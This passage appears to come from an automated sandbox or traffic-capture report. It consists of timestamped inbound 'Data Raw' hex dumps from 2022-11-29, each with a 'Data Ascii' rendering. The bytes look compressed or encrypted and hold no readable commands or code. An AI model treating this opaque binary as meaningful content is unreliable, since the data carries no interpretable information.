                                  2022-11-29 15:56:46 UTC3539INData Raw: c6 cf 86 88 7c 4c 6b 8a d0 8f 71 67 61 68 95 b4 49 d2 38 63 03 2e d8 ba 9d ee ef a0 ae ff aa 83 87 62 75 a7 5d 4a 0b 97 49 c7 f1 a3 f4 4e d4 8b cf 94 88 c4 5a 8f b3 0e 52 5a 9c c2 b0 ae ea 5b df 28 c8 84 a5 ac 15 4d ff ed fb d3 b1 bd 43 b3 8a f9 7e 4b bc a1 da fe 5a 8b 67 e2 46 d6 d4 07 c4 68 8b 9a 05 95 2c 98 74 93 b6 14 34 4c bd 48 8d 89 48 00 8e b2 4d 5b 40 e4 4f ab 01 f4 29 0b 08 69 38 f9 68 1b a9 e4 fc 04 c3 76 ea a4 de 03 d0 7f 34 22 fb c5 aa b4 87 1a a9 34 38 7a dc cf 1c 85 9f ab 1c bc 0d 62 a1 c0 29 2d 3f de 60 bf 81 b0 9e b2 e4 45 d8 19 80 b2 01 60 93 a7 cc 9b c2 1d 60 ce e6 8c 06 17 f0 10 76 48 af f1 fb b1 d6 6f c4 8c ae 50 ef 17 28 52 d7 cc 54 63 eb dd 17 58 d1 57 ce 80 a2 1f fd 76 f1 1c 65 56 a9 7e 33 b8 c6 9a 4f 8c 8b 9a 76 71 04 6e 7a f6 2b
                                  Data Ascii: |LkqgahI8c.bu]JINZRZ[(MC~KZgFh,t4LHHM[@O)i8hv4"48zb)-?`E``vHoP(RTcXWveV~3Ovqnz+
                                  2022-11-29 15:56:46 UTC3555INData Raw: 7e 76 52 47 e6 34 b5 f2 4d 1f 66 c8 2e 4f 3a ca 37 a6 ec 2d 9b 06 d5 bd 13 c1 a7 9f f1 f9 f7 b0 7a 0a 4b 0b 64 a2 58 8a cf f8 36 7b ee f3 6d 93 7e 8f 91 a5 f9 e0 11 01 c9 2b f8 05 ad ea e3 d6 ad bd 0a 80 ee 2d 30 3c 65 15 79 e6 3c d3 a0 af 6b ee e8 2d 21 17 c9 4f 0e 84 e0 2a 78 d1 af c8 7d e0 92 2f 6b 01 f4 4b 81 e0 1d f9 5f 82 00 e0 c2 00 ec 0f 45 4a e0 ba 02 a9 6f c9 02 80 09 8a 16 9a 85 25 6c 9c f8 42 55 e3 c7 ea 77 82 ea 60 a0 2d 6d fb 44 01 5d e8 f3 da 38 eb 7b 43 67 15 75 a4 b8 8f d9 80 10 3f 72 e5 20 14 59 1c 88 7f d0 e6 ae 73 7f c9 71 fe 3b 60 77 3b e1 b5 fc 6d f9 e5 63 91 41 95 fc a1 9a 70 84 e0 9e ab ae 3b 34 60 8f e0 75 c1 bf 1b bb f0 0c 21 0d a2 fc 61 43 08 9f ff b6 3c 86 ba fa 68 ed 28 2a 1f 42 6a 08 fe bc b0 a7 26 8a db cb a8 bb c4 f5 ae 52
                                  Data Ascii: ~vRG4Mf.O:7-zKdX6{m~+-0<ey<k-!O*x}/kK_EJo%lBUw`-mD]8{Cgu?r Ysq;`w;mcAp;4`u!aC<h(*Bj&R
                                  2022-11-29 15:56:46 UTC3571INData Raw: 75 a6 2b 6d fd 7f d9 a6 09 57 1b a2 89 84 e0 d3 ab 26 c8 4d ab 85 d9 d5 0a 52 7f 32 00 06 3c e8 23 af b8 10 65 b8 73 12 dc c7 65 d0 bb 63 be 93 6d 80 75 a7 0b 46 5d a1 24 2a 83 ac 14 4b ca 20 3e f2 32 96 82 02 70 ba 3c 20 89 14 81 6f ba e4 98 17 03 e2 06 63 95 ff e6 50 e7 78 66 6d eb 82 b8 04 fa 27 f3 13 f9 ec c7 39 86 c8 ba 53 85 b0 4a 25 4e 80 fa a3 13 b4 dc cc 17 9f b6 20 50 ca 7c b5 46 3c 30 d1 bd a0 6c b1 d8 de 59 3d 5f 2c d7 b7 90 26 a3 c9 8e fc b8 6a 92 2a 4c 98 79 c9 a1 09 08 da 87 6c 67 b4 be 0e 37 53 7c 61 97 ed d3 0b c5 62 7c 3d e7 f5 a2 bf 67 cf 8e d1 82 70 45 dd 14 b9 4d 03 60 e0 03 65 e1 0c 45 45 e9 35 62 90 69 67 d5 29 8a 28 de ca 8f 96 ec 41 7b d7 86 01 de f2 01 cc bb 30 6c 53 d0 36 95 8d e3 d6 13 4c 47 11 66 81 77 73 66 d0 96 4a 09 78 51
                                  Data Ascii: u+mW&MR2<#esecmuF]$*K >2p< ocPxfm'9SJ%N P|F<0lY=_,&j*Lylg7S|ab|=gpEM`eEE5big)(A{0lS6LGfwsfJxQ
                                  2022-11-29 15:56:46 UTC3587INData Raw: 88 43 f6 8e 58 4e 2d d3 bd b1 a8 ec 2d 01 39 6c 9f 73 96 f0 cb 53 ff 60 23 a8 7c ae 62 4b f6 4e c0 3e 02 e0 00 e5 7c 6e 21 66 84 8f 78 01 66 a3 1c 40 7b df 6a ff be 5d f3 1b 38 5d 17 4e 1c 1a d1 6b 7f a8 11 20 5f 35 f6 6d 60 4d a6 bd 2c 7e cb a4 34 c2 62 ec 2f 4e bb de 31 09 15 ae fe 36 83 16 3f 67 a5 85 6a f0 be 61 5c 20 22 0d df f5 16 26 be 49 ec c7 85 19 b6 dc 2a 1a 77 98 65 3d a9 58 6d f5 ef 95 8c cb 01 99 2c ba 9f 4b b6 c0 c2 36 91 2f 8f 1f 0d c4 8a 8e 8a fd 7d 90 f0 e1 cb 5e 50 6b 55 bb 8b 39 ad 38 80 b0 9c f8 07 00 ce 77 a4 50 f8 81 4a a3 53 8e 9c 1b 2c 72 7e 32 e3 7e e0 40 27 00 2d ee 4b 8c ce b1 58 2e 22 6b 83 85 8d c5 66 fb 2c 18 96 8a 63 f5 cc a6 53 dd 7b a4 b3 13 5d 2a d6 73 c2 a1 6b bd 59 cf f4 3d d5 53 fa ea ff 28 b0 05 7b d5 d5 6b e2 15 d5
                                  Data Ascii: CXN--9lsS`#|bKN>|n!fxf@{j]8]Nk _5m`M,~4b/N16?gja\ "&I*we=Xm,K6/}^PkU98wPJS,r~2~@'-KX."kf,cS{]*skY=S({k
                                  2022-11-29 15:56:46 UTC3603INData Raw: c5 2d 56 4b 6d ea 8a 7e 6c ff 82 24 ce 6c ad 61 de 74 73 f6 f8 54 af 48 d3 b2 a9 fb 16 4f 57 e2 9e 5d 26 8c 90 94 6e e6 81 1f e3 8f df ec 87 41 d8 26 f3 e9 a1 11 38 00 30 26 66 a9 75 26 14 4c af a8 3b e4 f9 1d b0 ed 8f 04 57 1c e0 4a 3d ed 2b 42 f9 12 2f bc d4 91 88 06 0e b2 5d aa 13 db d6 18 cb 3c e1 26 fe 96 85 ce cd 4d ef b9 ad e6 52 84 a5 9a 06 82 ee c6 a3 19 76 b4 5c dc 4f d8 af f7 db 8d 8e 65 4c 40 5b bc 4e 61 cf 0e 0e 44 d8 fc e7 3c 68 7e dd e4 ab 9d 85 e1 8e 5f b7 8f 97 ad 96 01 3c 35 fd f6 c0 85 be c2 ff fd 8c 8b 92 ec aa d2 fd d1 9e 15 be cd 96 32 21 a5 9e 27 6d 7c 90 58 f5 b3 98 84 1a 32 95 92 c2 e7 a1 60 2c 88 57 88 61 2b 1c 92 50 3e 35 bf d8 93 56 32 57 87 9d b3 d8 b8 21 df 7b 5c a0 d3 49 51 15 6c 39 31 db 6b 91 6a 30 f5 d0 e5 39 fc 4e 5a 70
                                  Data Ascii: -VKm~l$latsTHOW]&nA&80&fu&L;WJ=+B/]<&MRv\OeL@[NaD<h~_<52!'m|X2`,Wa+P>5V2W!{\IQl91kj09NZp
                                  2022-11-29 15:56:46 UTC3619INData Raw: 10 86 12 2e 44 3e d2 57 1f 34 69 be f6 3e 5c 53 67 55 41 7f b7 8a 94 c6 91 03 f7 ae a9 3b 28 0d 2e e3 a5 bc a8 e3 e4 cd a0 a6 7a 9f 20 7c a2 70 05 da e1 3d 46 b8 f2 cb b9 43 39 e0 5d d1 f3 43 9d 15 78 45 f1 0d a2 07 44 8d 20 9b d3 78 36 4a 8d 08 61 91 73 55 d5 8d b6 c3 2d 75 87 e1 2a 77 dc eb 12 c2 1b a6 da 41 bf 7a 26 2a 67 1f 5f 35 a2 3c 3f a7 23 3f e9 69 25 df 83 4c a8 df d9 76 28 5c 50 81 3d 20 d8 06 62 94 dd c6 1e cf b2 51 9b b2 52 51 bc 83 c7 0e 94 41 7e e9 67 c4 75 4f 5d 12 1e be b1 23 96 fc 80 90 57 cc be 37 2a 57 84 5d 09 f0 7f 8d bf 7e 5f c1 26 77 7e bc 26 28 fd 38 95 87 50 af f3 59 b5 0a 4d 9b 39 e9 6f 2f 05 ee a9 4a 82 03 0b 16 94 0a 1e 4e 92 b1 23 c9 c5 c9 2e f2 0e d9 9b ec b4 ed 3e 6a f8 c9 ce 88 59 bc 25 dc 49 42 a4 f7 b6 06 d2 f2 4a 94 85
                                  Data Ascii: .D>W4i>\SgUA;(.z |p=FC9]CxED x6JasU-u*wAz&*g_5<?#?i%Lv(\P= bQRQA~guO]#W7*W]~_&w~&(8PYM9o/JN#.>jY%IBJ
                                  2022-11-29 15:56:46 UTC3635INData Raw: 6f 91 9c 82 1f c5 62 05 38 65 5c 40 57 d4 27 39 72 43 3d f4 f4 79 90 51 92 94 b0 98 a9 2a 21 fe e4 22 02 97 12 a5 7b 70 7b 62 7c 84 c1 3a f6 72 f0 ef 5f 77 46 90 c3 3f 84 9e f1 0a f4 d5 1e 8b 94 14 ac 9f 4c 4a 2c 1a 76 6b ec a8 b1 78 1d f0 82 36 68 ec b4 8f 2f 7c 66 cc 06 15 52 a4 c3 a3 31 65 7b fa 8a 7d fd db ad c4 af 5e 6e f5 ac 9e e1 2c e0 11 15 c9 c2 55 a5 4b 80 58 0c df 4c c7 ce 24 20 a6 b2 63 f5 22 00 39 93 00 eb 90 b4 1b 7c 83 e8 67 46 4a 4f cc c6 c6 bd f6 a2 b5 99 6a 8a a4 70 a0 28 c4 ce be a7 51 60 26 c1 04 93 cc d9 ba ef d6 56 b2 08 a4 2f bd bb 51 4a 65 53 f2 25 ee 8b 11 3a 6a 8e 55 95 ce 97 da ce 25 84 e8 74 ed b3 3f bb 92 ed eb 3c f5 1b 0b 4d b0 8b ab 7e 0e 45 3f e1 a9 47 f5 77 25 d2 32 6e b9 2f d2 c1 10 87 f5 32 32 3a 1d b7 f6 08 1a 39 45 1b
                                  Data Ascii: ob8e\@W'9rC=yQ*!"{p{b|:r_wF?LJ,vkx6h/|fR1e{}^n,UKXL$ c"9|gFJOjp(Q`&V/QJeS%:jU%t?<M~E?Gw%2n/22:9E
                                  2022-11-29 15:56:46 UTC3651INData Raw: de fa 58 d8 14 a2 02 86 cd 23 fa f6 ae fc b0 29 52 be 4b 07 cb 22 e1 69 ae bb e3 53 b3 5c 13 e7 4c a1 57 c6 46 f0 36 8b e0 42 0a f1 66 6a d4 94 5f 2f d0 9e c9 bd d0 05 0b f4 a7 3d 01 f0 5b 85 85 53 ac 06 3a e9 c9 72 45 d1 bf 9e fe b2 d1 25 30 27 0b d4 fa ff 34 c8 24 7d 2a 87 d6 d5 97 42 b7 e8 05 0f 3b ee 0a 7d c7 0e 96 44 73 66 61 5f 15 40 01 ed 03 06 92 ee 0d e0 ea a4 da b1 5b 90 70 1e 6d 01 d2 55 3c ec e5 df 2b 8d d3 5c b2 07 64 82 1f e0 70 13 9f ba d1 60 6e 9d e6 df 4f 23 58 7e 28 2c f7 4b f0 d9 1a 20 ac 09 ac f9 c6 97 fc c3 58 c3 ed 92 9e 7e dd 44 c0 f9 6c ed c3 6a 91 52 9c 64 93 9b 6f 65 5a ba 29 9c 30 03 77 ff 55 d8 c8 69 6c a0 5d fe 61 97 4e e8 6b 53 55 e9 8a 9e fa 26 99 e5 66 51 8a c4 8f 4d 08 14 99 ec 2e 71 6d 54 cd f1 11 b1 de aa 0b cc 5d f4 ea
                                  Data Ascii: X#)RK"iS\LWF6Bfj_/=[S:rE%0'4$}*B;}Dsfa_@[pmU<+\dp`nO#X~(,K X~DljRdoeZ)0wUil]aNkSU&fQM.qmT]
                                  2022-11-29 15:56:46 UTC3667INData Raw: ed de c2 a4 a3 7f 79 2c d7 8e 04 94 8f c3 bc 28 8a ac 84 07 eb 47 2c 80 e7 70 fd fb 95 17 ba 41 a4 62 02 d4 4f db 79 c8 20 bb fb 9f cd 3a 40 98 b8 46 19 52 f8 ad 04 fb c0 64 44 5c 8c 98 3e b5 ec c7 46 4c b2 4f a3 a8 ca d4 b8 0e 18 52 0a b1 cb 94 aa 7b b8 ea 47 7a d7 bf cf 60 9c b2 4d 72 f2 6d 92 37 3d 9c dc 35 c3 8c 44 2f 0e 3f 28 e4 ba df b8 db e8 45 05 8c 43 94 f1 83 88 14 9f e3 95 28 e0 0a 48 0f cc f7 b8 29 3f b8 af 76 af ff 3f db 3a 09 83 0c 04 21 77 a2 91 b0 d2 08 51 fa 7f 6c fd c4 5d d9 ca 9d bb b4 b4 94 69 cc 63 02 89 90 60 f2 09 25 1c cd 3a 86 37 06 65 0e 9e 1e fe b6 8a 18 59 71 82 85 d9 a1 92 92 aa 89 84 b1 4b 4a 66 e5 2d e8 c0 92 40 74 03 32 86 1a 96 59 fe 8d 3e 66 30 cd 6d f1 44 65 8e 1f a2 f9 7d 0f 68 7d 1d 65 7f c2 b3 ec 9b 91 70 d9 07 00 26
                                  Data Ascii: y,(G,pAbOy :@FRdD\>FLOR{Gz`Mrm7=5D/?(EC(H)?v?:!wQl]ic`%:7eYqKJf-@t2Y>f0mDe}h}ep&
                                  2022-11-29 15:56:46 UTC3683INData Raw: d4 50 c9 7a f2 22 8b be 70 d7 95 df a3 ca dc 23 11 af fd 68 d8 a2 9f b4 2c d3 dd b3 a4 31 01 b2 4d 43 c3 13 01 13 ff dc 70 0e 44 4d 93 c7 38 35 8d 70 03 fd b4 ba 9c 1d 6e 87 1e fb d6 d0 a8 bf e1 fb 7b 94 d5 58 26 f4 d4 0e 5d 7f 05 66 71 8c 7a 82 c2 c4 b9 9f 59 66 d2 5e 43 36 95 ff 3a 31 68 8f 17 60 b2 48 66 14 f3 42 51 b0 c7 46 59 ef 3a a1 51 1a 6b 7b f2 6f 04 bc b3 ff 51 3e a0 11 c6 ee 51 db 2a b3 85 0d ac 86 2e 7c f6 a8 bb dd cb 13 9a b0 4d 90 0b ea c3 b9 cc 61 7e ff 37 50 02 21 d6 3a 03 c3 c7 1c 20 69 8b 6d f3 f1 62 bf 80 1c d3 03 1f ce 99 52 2b 97 a5 7e 05 2a d1 42 6c 70 7f b1 ac 0d 51 9a 81 19 35 c1 6a b9 78 a3 88 c6 2a f1 de 3e 86 9d ea df a0 ac ec 7c d0 4d a0 f2 d3 69 66 26 ba 76 34 e0 03 c0 45 64 88 aa 17 21 e0 5e fb 6b 08 5d d7 57 36 ee 93 45 2e
                                  Data Ascii: Pz"p#h,1MCpDM85pn{X&]fqzYf^C6:1h`HfBQFY:Qk{oQ>Q*.|Ma~7P!: imbR+~*BlpQ5jx*>|Mif&v4Ed!^k]W6E.
                                  2022-11-29 15:56:46 UTC3699INData Raw: 25 42 2b f5 ac b8 93 f8 12 aa de 01 89 a2 ca cf 2b f8 2a 40 59 0b 6b 78 c1 d7 86 aa fb 3c ed 24 93 38 e1 f4 6f 57 72 c9 be 14 67 6d c7 d2 ae 47 a8 9d 23 d0 2d 4a de e9 91 93 69 f4 ee 3f 37 bf 62 f1 1c 2c 3d df ab e3 07 5f 29 96 8d 49 93 b9 eb cb 28 08 74 a9 5a 35 13 b1 4b 59 a7 92 2b f8 86 92 77 84 2f d6 48 bd f2 75 24 60 3f 59 7e a2 a3 ec ee 78 76 7b 79 ac 64 8a 5e e7 69 b3 ca d8 04 7e de a5 55 c5 4b 36 9b ee ff 43 3d 58 97 45 ee 6c 56 04 22 5d 2f 83 45 66 3e 35 a8 86 85 83 8e 8e d7 38 92 d7 38 dc eb 11 af f9 2f 40 e1 10 09 cb 83 9c 0b 8a ae a9 99 29 03 58 e2 31 97 ac 44 5a 7d 7c 47 70 56 b8 fc 59 33 49 f9 5a a6 43 ad 2c f0 9a 1a 25 95 32 91 02 17 fa 15 a8 57 95 94 d0 ce 35 28 8f 34 9a cb 8a 27 84 ae 08 8f b4 e7 bf db 52 05 d1 d0 f7 59 d8 70 0e 65 79 d5
                                  Data Ascii: %B++*@Ykx<$8oWrgmG#-Ji?7b,=_)I(tZ5KY+w/Hu$`?Y~xv{yd^i~UK6C=XElV"]/Ef>588/@)X1DZ}|GpVY3IZC,%2W5(4'RYpey
                                  2022-11-29 15:56:46 UTC3715INData Raw: 1c f0 fb a1 fa 45 cc 7b cf bf 4d 4f 3a 7d 8d 52 5d d1 56 83 4a 06 a5 1d c1 74 ac 2f 48 83 d4 58 1f 53 f1 2e 5c be c7 b0 22 08 f3 a8 2b 5d 7b 43 52 25 0e 54 dc 45 7f 47 98 28 c6 32 e1 25 c6 02 b8 c3 24 91 0a c1 c2 74 7e 26 28 03 4d 3f 81 9f ca 2f 50 cd 11 b5 95 6f 02 49 ab b9 34 04 bc 55 79 0f fa 4a b6 d0 1f 4f b8 58 9e 14 60 93 95 a0 2b 12 21 12 dd 26 4b 87 78 9b f0 69 11 a1 ac 90 03 74 32 e9 0f 63 85 3e 95 7f bb aa 79 1e ed 46 86 29 e8 2a eb 83 e9 81 9d 83 c8 be be c2 e5 67 9b dc 51 2a 15 2e b4 c0 0a 01 96 13 80 11 54 8f b7 23 d6 6d f6 f0 89 02 52 6a 6a 19 cb ee ca 21 88 16 fd 43 5b b7 7a 29 e1 8d 85 3f 22 2c 39 ab fb 62 3e cf d8 c1 c4 9c 71 20 8a d6 ef 8e 71 55 7e 57 16 1a 21 25 3e b1 41 5e e9 01 c0 6e bb 55 fa 3f 67 f1 41 44 d7 c1 03 eb cb 4c 59 67 84
                                  Data Ascii: E{MO:}R]VJt/HXS.\"+]{CR%TEG(2%$t~&(M?/PoI4UyJOX`+!&Kxit2c>yF)*gQ*.T#mRjj!C[z)?",9b>q qU~W!%>A^nU?gADLYg
                                  2022-11-29 15:56:46 UTC3731INData Raw: 30 c7 69 da da 58 cd 5a 6e d7 3e 2d ad 65 c1 f4 2a c6 b3 ea 52 12 b3 ca f7 05 b3 61 e2 68 6d 76 9a ad 0c b9 19 6f 00 2f 9e eb da 17 c6 f0 81 5a 78 36 e5 3c f1 dd a7 2e 0e 7d 0a ee 70 62 e8 db 19 8c 45 84 d3 33 62 47 cc 5b a7 e4 60 63 0f f2 5f 6a f3 03 b2 bd 34 2e a4 c4 a6 09 2b fe 66 5a 7b f2 94 a3 91 07 d8 a3 e3 e2 2e 20 09 cd 5e cf 2d 10 0d f4 45 07 a7 76 76 52 52 69 1e b7 ce 2b c9 c3 22 df d3 9c 52 dc 9c 82 f8 0c 83 80 0f 3f db b5 8c d5 b5 90 46 67 c2 c0 eb eb 76 aa 11 d0 b1 93 d9 aa cd bc 3f 0a 90 50 a1 d0 53 13 29 c7 ce 55 9a 49 55 ff 62 5d c2 ab 90 b3 62 44 9d 28 ef 86 c3 93 e7 69 51 f7 ab a6 c3 e8 0f 75 c9 15 cf f6 ca f2 b3 5e d0 c7 3e e2 47 ee 94 61 a6 31 77 7f 9e b3 34 54 d2 6f 7f cb 25 94 83 79 d3 61 22 42 1e ae d8 77 21 84 71 04 c4 39 e9 bc 3d
                                  Data Ascii: 0iXZn>-e*Rahmvo/Zx6<.}pbE3bG[`c_j4.+fZ{. ^-EvvRRi+"R?Fgv?PS)UIUb]bD(iQu^>Ga1w4To%ya"Bw!q9=
                                  2022-11-29 15:56:46 UTC3747INData Raw: b4 5e 89 06 1a fa a5 51 38 5d c9 69 a0 d4 1d f9 c3 b4 2a 06 21 06 ee 3c 07 5b 22 07 9a 8d 7b 30 54 cb cb 86 fe 7f 03 c9 a5 26 7b 82 f1 f6 df 79 67 f6 05 da 4a 48 89 32 22 a0 f1 ea db 6b e8 a4 ce b7 60 96 b1 df 51 f5 c3 2b cb 55 b6 b5 80 e6 be b8 df a3 d8 d2 ce fd 44 46 8d f8 9b 4b 61 03 e7 3d 13 93 2b a0 89 89 30 f7 d5 22 ad d8 cb af fc 71 c6 7c d7 dc b0 79 d3 9e 78 bb a5 53 bd 88 3d 9d 72 1e c3 9a 64 fb 10 d0 ef 0b 07 ac c7 82 60 62 1e 70 dc c3 3a 96 4c b4 84 94 06 01 d3 c3 e7 a8 17 25 45 11 f5 9b 00 90 2b 69 3c d5 b3 60 85 66 32 bf dc a8 f7 f1 06 0e 52 63 de a7 3f 2a 86 6c b5 44 66 69 74 bb 46 5f 91 ab 97 e4 13 a6 95 95 fe ab 6e c8 01 1c d4 ad b9 57 38 6b fd 5a 3f e2 56 9a b9 65 5d 50 f4 26 18 96 2d d2 d3 47 df ea 66 fc d5 4b 05 44 3b 9b 33 24 b2 de 7a
                                  Data Ascii: ^Q8]i*!<["{0T&{ygJH2"k`Q+UDFKa=+0"q|yxS=rd`bp:L%E+i<`f2Rc?*lDfitF_nW8kZ?Ve]P&-GfKD;3$z
                                  2022-11-29 15:56:46 UTC3763INData Raw: e6 be 6d e4 17 89 29 4a cd b0 02 26 ab 84 15 ad b4 ba 7d 4d 57 3e b7 01 fb 8c a1 68 b2 66 54 42 9d 01 3b 63 13 32 fb 6d e0 49 d7 06 70 1c f5 d5 d5 62 c8 f5 bb 35 6a 3d 00 d4 49 e0 28 66 c9 3d 0f 60 05 de a7 44 30 f4 2e cf a8 79 e2 2f c9 32 48 f5 fb 20 4a 75 ce 19 91 30 8b 85 07 1d 44 f0 ad 76 9d 0c 75 31 93 48 9a fe 73 58 3f bf e0 d2 fc b7 62 5c c7 30 fa 6c 98 f8 0a 0a 20 76 ec 92 46 18 f8 85 69 22 82 35 ac 30 38 ec 77 0b bd 4c 68 2b 16 a2 54 34 4f be 4d 25 46 53 a4 ea f7 c6 b0 69 e8 46 05 46 0b b3 40 36 bd 66 fd 5e 49 5b 60 38 a0 9f c4 27 5b cf 0d e4 00 59 e5 7f 1f 2a d1 94 71 26 cc 68 82 15 34 ff 29 42 1c 19 e1 3a 66 45 8a b3 2e de 12 08 35 18 5f c9 1d fd 14 21 b7 19 de cd 4a 0d 5f 03 95 78 79 b7 55 11 be ab 04 e9 58 35 94 42 01 fd bf b0 fe 41 9d 4f c1
                                  Data Ascii: m)J&}MW>hfTB;c2mIpb5j=I(f=`D0.y/2H Ju0Dvu1HsX?b\0l vFi"508wLh+T4OM%FSiFF@6f^I[`8'[Y*q&h4)B:fE.5_!J_xyUX5BAO
                                  2022-11-29 15:56:46 UTC3779INData Raw: c9 9f 5f aa f3 fe 6f 84 1a f9 49 8a 86 53 77 94 d3 9c 17 cb 57 b5 ee cb 03 94 f4 d7 ca 30 02 8f ab 5f cc aa cb 25 b4 3c 90 c8 df 6a 3d dc 67 33 b9 e0 26 8a 7c 9b 5a 85 47 59 8f 09 1b f4 5b 84 1e 4b 43 e4 c5 b5 de b4 fa 82 dd cb 6d dd 1a 21 f8 dc f2 df b1 6d c2 ca 11 43 4f ff 64 5e 8f 84 09 92 98 21 4b 0e 58 49 84 9a 9d 37 a0 d9 44 b1 2d bc 5e a9 ba c3 e3 52 5d 2e 78 37 ef ed 78 f4 ec 4f 3c 05 9d 96 fd 81 73 31 ba ff fc 7f 28 e2 02 a9 7c e4 c9 cd 46 c7 ae 64 dd 7f 79 9f 19 c1 96 19 3f 38 61 29 01 20 53 9e e0 cd 03 2e c5 42 f3 d2 83 11 36 96 f2 a5 91 5b e5 04 5d 7a 7e bc 05 6d 0a 71 2c 33 49 ba 57 14 a7 7b 48 68 eb ad 0a bc cf d0 84 97 b2 dc a1 0a 77 92 a0 8c d5 b7 36 47 ac a5 51 2e 96 ef 6e d4 57 cc 0a 8d 7b db 7a c6 a5 9c 2b 26 40 bc 1b 89 cf 77 46 de c6
                                  Data Ascii: _oISwW0_%<j=g3&|ZGY[KCm!mCOd^!KXI7D-^R].x7xO<s1(|Fdy?8a) S.B6[]z~mq,3IW{Hhw6GQ.nW{z+&@wF
                                  2022-11-29 15:56:46 UTC3795INData Raw: 60 05 76 5c 8d 25 72 94 23 7c d1 9f 5e 28 25 c3 6d d3 68 1c a2 3a 5a 6b 9c 53 8a ee ff 7d 9c 40 ff 4c 0c 72 ad ab e3 af 92 ea 21 ee 4b 7d f1 97 3f 9e fd 56 e0 bb 33 32 0f a4 d5 dd c7 25 76 62 b5 ca af 81 5a 6e 29 29 13 ee 68 07 47 7a ca 02 1a ca a7 ff 20 48 f1 c9 0d f4 3a 43 cd 8f d1 01 24 40 53 f8 50 d7 89 cb bf a8 9d e6 5e 52 a3 07 7b 92 8e 9c 69 e1 31 60 51 d9 7c e4 ac 55 8a 94 9b dc 0c d8 47 99 30 e8 74 70 16 fd 42 7b 3b a2 fb 33 5f 29 0e 74 be 88 83 b9 e4 07 a2 1e e8 dc d2 f5 17 50 f1 39 72 80 8a 1d e3 d4 70 32 37 a0 32 17 ea 6e a5 5f 2b 6f b8 dd 44 96 4a 4d 3e d9 00 b3 ca 05 03 be f9 d7 25 53 a6 ee 98 aa c9 54 ba 12 fe b1 5f b5 cf 53 04 b5 54 a7 04 9c 71 e6 c3 e4 38 fc 67 58 96 1c f5 1a a6 14 03 2f 2f 00 00 80 78 aa 9c c8 55 43 c9 ee 3d 8c d7 4a 97
                                  Data Ascii: `v\%r#|^(%mh:ZkS}@Lr!K}?V32%vbZn))hGz H:C$@SP^R{i1`Q|UG0tpB{;3_)tP9rp272n_+oDJM>%ST_STq8gX//xUC=J
                                  2022-11-29 15:56:46 UTC3811INData Raw: 02 bf 97 9a 85 f0 91 32 8f e3 d9 5a b7 6c 11 85 ba 05 60 c9 29 13 57 c5 bd 47 af 66 11 17 94 4d aa fa 2a bc fe 5d 58 1a db 95 0e 67 06 c1 60 8a f5 69 a1 b7 49 c0 f2 b2 18 57 d4 51 cf 4c 68 67 3d 93 70 37 ab 32 8b 06 ca f8 36 78 56 97 6f df 7c af a0 29 4b f4 e9 26 0a 3d ba 76 cc 44 87 b2 b4 00 e6 1e 54 42 bb ff ba 32 4f 1d 43 17 a9 c7 cc 15 65 1b 40 a2 b4 d3 77 6e 68 fd 4b f4 9e 17 17 06 a8 83 35 cf 86 24 31 91 83 ab 1b e2 d2 9f 34 62 53 4e 78 60 3c 76 5a 18 5b 67 28 9f 3a c5 aa 39 d8 64 e5 a0 d3 01 55 b0 1a a3 59 91 b3 cd de a3 ad a1 c4 f2 9d 3a 59 1c c1 e1 3f 25 43 e2 7c 6d 23 ed 96 cf 89 5d 59 6d 7b 34 8a b4 c6 b1 29 19 05 96 5c cc 29 2f f5 36 ac ea 9f 79 4e c0 66 19 06 83 65 ba 79 ba 13 3f fb 52 6b 01 74 2d 98 a7 7a 14 e9 cb 07 a8 86 15 bf 74 c9 40 16
                                  Data Ascii: 2Zl`)WGfM*]Xg`iIWQLhg=p726xVo|)K&=vDTB2OCe@wnhK5$14bSNx`<vZ[g(:9dUY:Y?%C|m#]Ym{4)\)/6yNfey?Rkt-zt@
                                  2022-11-29 15:56:46 UTC3827INData Raw: 21 94 f2 76 be f9 17 26 4d ea ee 5c 8a 88 57 bc 14 36 92 db a0 48 a3 a8 7a 48 bb 62 5f 93 03 fe ef 64 c2 2c ce c8 49 4b 1b 0a 0f 2c 72 d5 9e 67 85 41 20 79 b4 8f 6a 91 7c f2 be 76 04 97 d5 74 ad 70 fa bd d6 8a 7d 42 45 56 3f 3f 1c c2 39 04 68 b7 aa 10 9d 11 25 4c f7 ad f2 94 58 08 16 67 2b 7f b1 8e f5 f5 78 de e7 3f ae d9 7d 9d a5 4d d1 3d 8b 13 6e 76 da 31 1e 12 c0 a3 dc ed 93 ec 90 0a 13 dc 18 5a 8a ce d4 a1 67 e7 ab b5 78 a1 cd e6 bc 99 14 c0 4b 08 db 51 aa 17 11 57 ef 2c 4a 48 38 e8 ac 6a 8f 00 11 c4 df 42 21 42 57 62 e0 98 92 9b e6 4e 73 78 13 09 3a 38 91 4f 7d 9a fd 05 1d c5 20 5b a2 ae 8b 4a 20 d8 af fc 30 7d 3a d0 8b d1 d7 5f d3 58 1b 40 60 39 a9 ad d7 2d 79 bd 29 2a db 0e f2 7b 06 89 1d af cd 69 0c 09 eb 28 93 35 4b 81 cd 86 5b 3f b3 34 86 2d bc
                                  Data Ascii: !v&M\W6HzHb_d,IK,rgA yj|vtp}BEV??9h%LXg+x?}M=nv1ZgxKQW,JH8jB!BWbNsx:8O} [J 0}:_X@`9-y)*{i(5K[?4-
                                  2022-11-29 15:56:46 UTC3843INData Raw: f8 e7 bd 73 4c 86 83 87 3a 56 f2 ec 1e d6 56 69 bc f6 20 69 aa bb 04 31 17 fc 93 50 ba c3 5c af 83 37 e9 44 d6 12 19 9f 53 fc 47 4c 67 2b 6b 54 e4 9c 0b 2c e1 65 4f 48 39 e5 5a 4d 7c 6f 34 ef a7 33 26 a9 bc 22 17 ca 4a d7 e4 ba 84 1a e5 b5 b8 45 5a 80 03 a8 96 7b 4d f1 53 e5 c1 88 ac 77 06 17 5b b7 dc 12 9b 68 d9 a1 05 58 62 25 2a 90 ce 25 56 b4 ca 7e 37 90 f0 68 88 43 56 ab 25 ab 11 de ea 79 d3 15 72 51 4a fe 8c a6 f6 84 5f b9 02 8b 09 f0 bf 89 c5 a1 e6 f8 2b af 55 e6 2d 44 f2 2b a8 b5 67 c7 fb a5 13 ff 9e 5a 7d aa 29 bf 2e 1a 6a 1c 2b e1 ce ef 71 9d 0c b9 9e eb 19 0d ab 98 1f e6 4c d5 f7 da 52 58 fc fd e7 d5 e2 eb b8 76 64 8a 37 1a fd b8 a7 fb a3 6b f9 96 29 78 bb 7d 49 3f d8 18 89 5b df 54 e7 e9 c1 99 53 7f b0 f7 fb d3 5e 46 5d ac 41 fe e2 0b 4f 27 99
